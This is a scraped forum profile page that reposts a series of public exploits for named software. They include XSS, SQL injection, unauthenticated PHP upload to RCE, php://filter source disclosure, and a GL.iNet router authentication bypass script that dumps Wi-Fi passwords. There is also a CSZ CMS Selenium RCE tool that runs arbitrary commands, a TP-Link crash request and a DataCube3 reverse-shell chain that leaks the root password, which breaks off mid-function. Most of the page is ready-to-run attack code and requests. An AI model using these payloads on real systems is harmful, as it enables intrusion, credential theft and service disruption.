Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Neontext Wordpress Plugin - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS) # Date: 2023-11-15 # Exploit Author: Eren Car # Vendor Homepage: https://www.eralion.com/ # Software Link: https://downloads.wordpress.org/plugin/neon-text.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.4.1 # CVE : CVE-2023-5817 # 1. Description: The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the posts page and create new post. c. Add shorcode block and insert the following payload: [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box] d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.
  2. HireHackking

    Lot Reservation Management System - Unauthenticated File Upload and Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ------------------------------------------------------------------------------------------------------------------------------------------------------------------ About The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Vulnerability:- The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server. Proof of Concept:- (HTTP POST Request) POST /lot/admin/ajax.php?action=save_division HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027 Content-Length: 606 Origin: http://192.168.150.228 Connection: close Referer: http://192.168.150.228/lot/admin/index.php?page=divisions -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="id" -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="name" sample -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="description" sample -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/x-php <?php phpinfo() ?> -----------------------------217984066236596965684247013027-- Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.
  3. HireHackking

    GLiNet - Router Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    DZONERZY Security Research GLiNet: Router Authentication Bypass ======================================================================== Contents ======================================================================== 1. Overview 2. Detailed Description 3. Exploit 4. Timeline ======================================================================== 1. Overview ======================================================================== CVE-2023-46453 is a remote authentication bypass vulnerability in the web interface of GLiNet routers running firmware versions 4.x and up. The vulnerability allows an attacker to bypass authentication and gain access to the router's web interface. ======================================================================== 2. Detailed Description ======================================================================== The vulnerability is caused by a lack of proper authentication checks in /usr/sbin/gl-ngx-session file. The file is responsible for authenticating users to the web interface. The authentication is in different stages. Stage 1: During the first stage the user send a request to the challenge rcp endpoint. The endpoint returns a random nonce value used later in the authentication process. Stage 2: During the second stage the user sends a request to the login rcp endpoint with the username and the encrypted password. The encrypted password is calculated by the following formula: md5(username + crypt(password) + nonce) The crypt function is the standard unix crypt function. The vulnerability lies in the fact that the username is not sanitized properly before being passed to the login_test function in the lua script. ------------------------------------------------------------------------ local function login_test(username, hash) if not username or username == "" then return false end for l in io.lines("/etc/shadow") do local pw = l:match('^' .. username .. ':([^:]+)') if pw then for nonce in pairs(nonces) do if utils.md5(table.concat({username, pw, nonce}, ":")) == hash then nonces[nonce] = nil nonce_cnt = nonce_cnt - 1 return true end end return false end end return false end ------------------------------------------------------------------------ This script check the username against the /etc/shadow file. If the username is found in the file the script will extract the password hash and compare it to the hash sent by the user. If the hashes match the user is authenticated. The issue is that the username is not sanitized properly before being concatenated with the regex. This allows an attacker to inject a regex into the username field and modify the final behavior of the regex. for instance, the following username will match the userid of the root user: root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+) This will match the "root:" string and then any character until the next ":" character. This will cause the script skip the password and return the user id instead. Since the user id of the root user is always 0, the script will always return: md5("root:[^:]+:[^:]+" + "0" + nonce) Since this value is always the same, the attacker can simply send the known hash value to the login rcp endpoint and gain access to the web interface. Anyway this approach won't work as expected since later in the code inside the this check appear: ------------------------------------------------------------------------ local aclgroup = db.get_acl_by_username(username) local sid = utils.generate_id(32) sessions[sid] = { username = username, aclgroup = aclgroup, timeout = time_now() + session_timeout } ------------------------------------------------------------------------ The username which is now our custom regex will be passed to the get_acl_by_username function. This function will check the username against a database and return the aclgroup associated with the username. If the username is not found in the database the function will return nil, thus causing attack to fail. By checking the code we can see that the get_acl_by_username function is actually appending our raw string to a query and then executing it. This means that we can inject a sql query into the username field and make it return a valid aclgroup. ------------------------------------------------------------------------ M.get_acl_by_username = function(username) if username == "root" then return "root" end local db = sqlite3.open(DB) local sql = string.format("SELECT acl FROM account WHERE username = '%s'", username) local aclgroup = "" for a in db:rows(sql) do aclgroup = a[1] end db:close() return aclgroup end ------------------------------------------------------------------------ Using this payload we were able to craft a username which is both a valid regex and a valid sql query: roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+ this will make the sql query become: SELECT acl FROM account WHERE username = 'roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+' which will return the aclgroup of the root user (root). ======================================================================== 3. Exploit ======================================================================== ------------------------------------------------------------------------ # Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass # Date: 18/10/2023 # Exploit Author: Daniele 'dzonerzy' Linguaglossa # Vendor Homepage: https://www.gl-inet.com/ # Vulnerable Devices: # GL.iNet GL-MT3000 (4.3.7) # GL.iNet GL-AR300M(4.3.7) # GL.iNet GL-B1300 (4.3.7) # GL.iNet GL-AX1800 (4.3.7) # GL.iNet GL-AR750S (4.3.7) # GL.iNet GL-MT2500 (4.3.7) # GL.iNet GL-AXT1800 (4.3.7) # GL.iNet GL-X3000 (4.3.7) # GL.iNet GL-SFT1200 (4.3.7) # And many more... # Version: 4.3.7 # Firmware Release Date: 2023/09/13 # CVE: CVE-2023-46453 from urllib.parse import urlparse import requests import hashlib import random import sys def exploit(url): try: requests.packages.urllib3.disable_warnings() host = urlparse(url) url = f"{host.scheme}://{host.netloc}/rpc" print(f"[*] Target: {url}") print("[*] Retrieving nonce...") nonce = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "challenge", "params": {"username": "root"} }, timeout=5).json() if "result" in nonce and "nonce" in nonce["result"]: print(f"[*] Got nonce: {nonce['result']['nonce']} !") else: print("[!] Nonce not found, exiting... :(") sys.exit(1) print("[*] Retrieving authentication token for root...") md5_hash = hashlib.md5() md5_hash.update( f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode()) password = md5_hash.hexdigest() token = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "login", "params": { "username": f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+", "hash": password } }, timeout=5).json() if "result" in token and "sid" in token["result"]: print(f"[*] Got token: {token['result']['sid']} !") else: print("[!] Token not found, exiting... :(") sys.exit(1) print("[*] Checking if we are root...") check = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "call", "params": [token["result"]["sid"], "system", "get_status", {}] }, timeout=5).json() if "result" in check and "wifi" in check["result"]: print("[*] We are authenticated as root! :)") print("[*] Below some info:") for wifi in check["result"]["wifi"]: print(f"[*] --------------------") print(f"[*] SSID: {wifi['ssid']}") print(f"[*] Password: {wifi['passwd']}") print(f"[*] Band: {wifi['band']}") print(f"[*] --------------------") else: print("[!] Something went wrong, exiting... :(") sys.exit(1) except requests.exceptions.Timeout: print("[!] Timeout error, exiting... :(") sys.exit(1) except KeyboardInterrupt: print(f"[!] Something went wrong: {e}") if __name__ == "__main__": print("GL.iNet Auth Bypass\n") if len(sys.argv) < 2: print( f"Usage: python3 {sys.argv[1]} https://target.com", file=sys.stderr) sys.exit(0) else: exploit(sys.argv[1]) ------------------------------------------------------------------------ ======================================================================== 4. Timeline ======================================================================== 2023/09/13 - Vulnerability discovered 2023/09/14 - CVE-2023-46453 requested 2023/09/20 - Vendor contacted 2023/09/20 - Vendor replied 2023/09/30 - CVE-2023-46453 assigned 2023/11/08 - Vulnerability patched and fix released
  4. HireHackking

    CVE-2023-50071 - Multiple SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities # Date: 15/12/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-50071 *Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.*Payload*: '+(select*from(select(sleep(20)))a)+' *Steps to reproduce*: 1- Log in to the application. 2- Navigate to the page /customer_support/index.php?page=new_ticket. 3- Create a new ticket and insert a malicious payload into one of the following parameters: department_id, customer_id, or subject. *Request:* POST /customer_support/ajax.php?action=save_ticket HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835 Content-Length: 853 Origin: http://192.168.68.148 Connection: close Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="id" -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="subject" teste'+(select*from(select(sleep(5)))a)+' -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="customer_id" 3 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="department_id" 4 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="description" <p>Blahs<br></p> -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------81419250823331111993422505835--
  5. HireHackking

    Lot Reservation Management System - Unauthenticated File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ------------------------------------------------------------------------------------------------------------------------------------------------------------------ About The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Vulnerability:- The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario. Proof of Concept:- (HTTP POST Request) GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn Upgrade-Insecure-Requests: 1 The same can be achieved by removing the PHPSESSID cookie as below:- GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Upgrade-Insecure-Requests: 1 The file requested will be returned in base64 format in returned HTTP response. The attack can also be used to traverse directories to return files outside the web root. GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Upgrade-Insecure-Requests: 1 This will return test.php file in the D:\ directory.
  6. HireHackking

    elFinder Web file manager Version - 2.1.53 Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution # Date: 23/11/2023 # Exploit Author: tmrswrr # Google Dork: intitle:"elFinder 2.1.53" # Vendor Homepage: https://studio-42.github.io/elFinder/ # Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip # Version: 2.1.53 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS 1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager 2 ) Click Template Main and upload this test.php file : <?php echo system('cat /etc/passwd'); ?> 3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
  7. HireHackking

    CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution # Date: 17/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download # Version: Version 1.3.0 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS import os import zipfile from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.firefox.options import Options as FirefoxOptions from selenium.webdriver.firefox.service import Service as FirefoxService from webdriver_manager.firefox import GeckoDriverManager from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import NoSuchElementException, TimeoutException import requests from time import sleep import sys import random import time import platform import tarfile from io import BytesIO email = "admin@admin.com" password = "password" class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) def entryy(): x = color_random[0] + """ ╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮ ┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃ ┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯ ┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃ ┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃ ╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯ << CSZ CMS Version 1.3.0 RCE >> << CODED BY TMRSWRR >> << GITHUB==>capture0x >> \n""" for c in x: print(c, end='') sys.stdout.flush() sleep(0.0045) oo = " " * 6 + 29 * "░⣿" + "\n\n" for c in oo: print(colors.CGREEN + c, end='') sys.stdout.flush() sleep(0.0065) tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n" for c in tt: print(colors.CWHITE + c, end='') sys.stdout.flush() sleep(0.0065) xx = " " * 6 + 29 * "░⣿" + "\n\n" for c in xx: print(colors.CGREEN + c, end='') sys.stdout.flush() sleep(0.0065) def check_geckodriver(): current_directory = os.path.dirname(os.path.abspath(__file__)) geckodriver_path = os.path.join(current_directory, 'geckodriver') if not os.path.isfile(geckodriver_path): red = "\033[91m" reset = "\033[0m" print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset) user_input = input("Would you like to download it now? (yes/no): ").lower() if user_input == 'yes': download_geckodriver(current_directory) else: print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset) sys.exit(1) def download_geckodriver(directory): print("[*] Detecting OS and architecture...") os_name = platform.system().lower() arch, _ = platform.architecture() if os_name == "linux": os_name = "linux" arch = "64" if arch == "64bit" else "32" elif os_name == "darwin": os_name = "macos" arch = "aarch64" if platform.processor() == "arm" else "" elif os_name == "windows": os_name = "win" arch = "64" if arch == "64bit" else "32" else: print("[!] Unsupported operating system.") sys.exit(1) geckodriver_version = "v0.33.0" geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}" ext = "zip" if os_name == "win" else "tar.gz" url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}" print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...") response = requests.get(url, stream=True) if response.status_code == 200: print("[*] Extracting GeckoDriver...") if ext == "tar.gz": with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar: tar.extractall(path=directory) else: with zipfile.ZipFile(BytesIO(response.content)) as zip_ref: zip_ref.extractall(directory) print("[+] GeckoDriver downloaded and extracted successfully.") else: print("[!] Failed to download GeckoDriver.") sys.exit(1) def create_zip_file(php_filename, zip_filename, php_code): try: with open(php_filename, 'w') as file: file.write(php_code) with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(php_filename) print("[+] Zip file created successfully.") os.remove(php_filename) return zip_filename except Exception as e: print(f"[!] Error creating zip file: {e}") sys.exit(1) def main(base_url, command): if not base_url.endswith('/'): base_url += '/' zip_filename = None check_geckodriver() try: firefox_options = FirefoxOptions() firefox_options.add_argument("--headless") script_directory = os.path.dirname(os.path.abspath(__file__)) geckodriver_path = os.path.join(script_directory, 'geckodriver') service = FirefoxService(executable_path=geckodriver_path) driver = webdriver.Firefox(service=service, options=firefox_options) print("[*] Exploit initiated.") # Login driver.get(base_url + "admin/login") print("[*] Accessing login page...") driver.find_element(By.NAME, "email").send_keys(f"{email}") driver.find_element(By.NAME, "password").send_keys(f"{password}") driver.find_element(By.ID, "login_submit").click() print("[*] Credentials submitted...") try: error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]") if error_message.is_displayed(): print("[!] Login failed: Invalid credentials.") driver.quit() sys.exit(1) except NoSuchElementException: print("[+] Login successful.") # File creation print("[*] Preparing exploit files...") php_code = f"<?php echo system('{command}'); ?>" zip_filename = create_zip_file("exploit.php", "payload.zip", php_code) driver.get(base_url + "admin/upgrade") print("[*] Uploading exploit payload...") file_input = driver.find_element(By.ID, "file_upload") file_input.send_keys(os.path.join(os.getcwd(), zip_filename)) # Uploading driver.find_element(By.ID, "submit").click() WebDriverWait(driver, 10).until(EC.alert_is_present()) alert = driver.switch_to.alert alert.accept() # Exploit result exploit_url = base_url + "exploit.php" response = requests.get(exploit_url) print(f"[+] Exploit response:\n\n{response.text}") except Exception as e: print(f"[!] Error: {e}") finally: driver.quit() if zip_filename and os.path.exists(zip_filename): os.remove(zip_filename) if __name__ == "__main__": entryy() if len(sys.argv) < 3: print("Usage: python script.py [BASE_URL] [COMMAND]") else: main(sys.argv[1], sys.argv[2])
  8. HireHackking

    TP-Link TL-WR740N - Buffer Overflow 'DOS'

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC----------------------------------------- #!/usr/bin/python import requests from requests.auth import HTTPBasicAuth import base64 def send_request(ip, username, password): auth_url = f"http://{ip}:8082" target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20" credentials = f"{username}:{password}" encoded_credentials = base64.b64encode(credentials.encode()).decode() headers = { "Host": f"{ip}:8082", "Authorization": f"Basic {encoded_credentials}", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } session = requests.Session() response = session.get(target_url, headers=headers) if response.status_code == 200: print("Server Crashed") print(response.text) else: print(f"Script Completed with status code {response.status_code}") ip_address = input("Enter IP address of the host: ") username = input("Enter username: ") password = input("Enter password: ") send_request(ip_address, username, password)
  9. HireHackking

    DataCube3 v1.0 - Unrestricted file upload 'RCE'

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings() def banner(): dataCube3Logo = """ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo)) def extractRootPwd(RHOST, RPORT, protocol): url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') scriptTag = str(soup.find_all('script')[12]).replace(' ', '') rawLeakedData = re.findall('configData:.*,', scriptTag)[0] jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0])) adminPassword = jsonLeakedData[12]['value'] rootPassword = jsonLeakedData[14]['value'] print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword)) return rootPassword except: print('[ERROR] Can\'t grab the DataCube3 version...') def generateAuthCookie(RHOST, RPORT, protocol, rootPassword): print('[INFO] Generating DataCube3 auth cookie ...') url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) data = { 'user_id': 'root', 'user_pw': rootPassword, 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3' } 